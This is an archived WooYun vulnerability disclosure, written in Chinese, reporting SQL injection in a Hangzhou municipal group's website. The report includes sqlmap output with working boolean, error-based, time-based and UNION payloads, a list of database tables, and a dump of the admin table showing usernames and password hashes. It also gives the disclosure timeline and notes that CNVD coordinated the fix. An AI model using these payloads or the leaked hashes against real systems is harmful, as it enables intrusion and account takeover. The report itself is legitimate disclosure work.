乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-15: 细节已通知厂商并且等待厂商处理中 2015-12-18: 厂商已经确认,细节仅向厂商公开 2015-12-28: 细节向核心白帽子及相关领域专家公开 2016-01-07: 细节向普通白帽子公开 2016-01-17: 细节向实习白帽子公开 2016-01-14: 细节向公众公开
杭州市政集团存在SQL注入漏洞,可影响多个站点
注入点:http://**.**.**.**/news_detail.php?sid=1&fid=225&id=909&h=2
sqlmap resumed the following injection point(s) from stored session:---Parameter: sid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: sid=1 AND 6648=6648&fid=225&id=909&h=2 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: sid=1 AND (SELECT 5158 FROM(SELECT COUNT(*),CONCAT(0x717a766a71,(SELECT (ELT(5158=5158,1))),0x7171787171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&fid=225&id=909&h=2 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 OR time-based blind (SELECT) Payload: sid=1 OR (SELECT * FROM (SELECT(SLEEP(5)))kDeJ)&fid=225&id=909&h=2 Type: UNION query Title: Generic UNION query (NULL) - 3 columns Payload: sid=-7637 UNION ALL SELECT NULL,NULL,CONCAT(0x717a766a71,0x76494f4d41667a6b7672,0x7171787171)-- &fid=225&id=909&h=2---web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, Microsoft IIS 7.5, PHP 5.3.29back-end DBMS: MySQL 5.0available databases [11]:[*] hzaf[*] hzkaka[*] hzscmz[*] hzshizheng[*] hzsz_en[*] information_schema[*] mysql[*] sccs[*] test[*] xyjdnew[*] yamei
当前数据库:
current database: 'hzshizheng'
Database: hzshizheng[53 tables]+--------------------+| hxcms_about || hxcms_addlist || hxcms_address || hxcms_admin || hxcms_allsky || hxcms_announce || hxcms_bodys || hxcms_bodytest || hxcms_booking || hxcms_buy || hxcms_buycar_model || hxcms_channel || hxcms_cjbm || hxcms_class || hxcms_classfiy || hxcms_coll || hxcms_comments || hxcms_config || hxcms_contact || hxcms_dkbuy || hxcms_dzyd || hxcms_famous || hxcms_field || hxcms_food || hxcms_friends || hxcms_honors || hxcms_job || hxcms_joinline || hxcms_jsbm || hxcms_jxgl || hxcms_jyjl || hxcms_member || hxcms_memup || hxcms_myfav || hxcms_network || hxcms_news || hxcms_order || hxcms_orderlist || hxcms_orders || hxcms_product || hxcms_qrbm || hxcms_questions || hxcms_resume || hxcms_select || hxcms_travel || hxcms_visit || hxcms_weblink || hxcms_xjjl || hxcms_xsgl || hxcms_xxfg || hxcms_zxfw || hxcms_zyjs || hxcms_zypx |+--------------------+
管理员表
Table: hxcms_admin[8 columns]+---------------+---------------+| Column | Type |+---------------+---------------+| adminclass | varchar(255) || adminConfig | varchar(255) || adminDate | datetime || adminlock | varbinary(20) || adminlov | int(11) || adminName | varchar(255) || adminPassWord | varchar(255) || ID | int(11) |+---------------+---------------+Database: hzshizhengTable: hxcms_admin[3 entries]+----+----------+-----------+---------------------+-----------+------------+-------------------------------------------------+----------------------------------+| ID | adminlov | adminName | adminDate | adminlock | adminclass | adminConfig | adminPassWord |+----+----------+-----------+---------------------+-----------+------------+-------------------------------------------------+----------------------------------+| 1 | 520 | admin | 2010-04-14 00:00:00 | Q4uEKh | NULL | <blank> | 6b9002a9937cb5581b70383623de69bc || 9 | 1 | login | 2010-07-27 16:50:01 | qOOTwT | <blank> | 1,2,4,9,11,14,15,26,30,31,36 | 4dc2b28fb2a61a397d751b946e492cd7 || 19 | 0 | wang | 2011-11-24 22:30:04 | o32dpU | <blank> | 1,6,9,11,15,26,30,31,32,33,34,35,36,37,38,39,40 | b6346e26590462baef3592f2387d70c8 |+----+----------+-----------+---------------------+-----------+------------+-------------------------------------------------+----------------------------------+
危害等级:高
漏洞Rank:10
确认时间:2015-12-18 18:23
CNVD确认并复现所述情况,已经转由CNCERT下发给浙江分中心,由其后续协调网站管理单位处置.
暂无
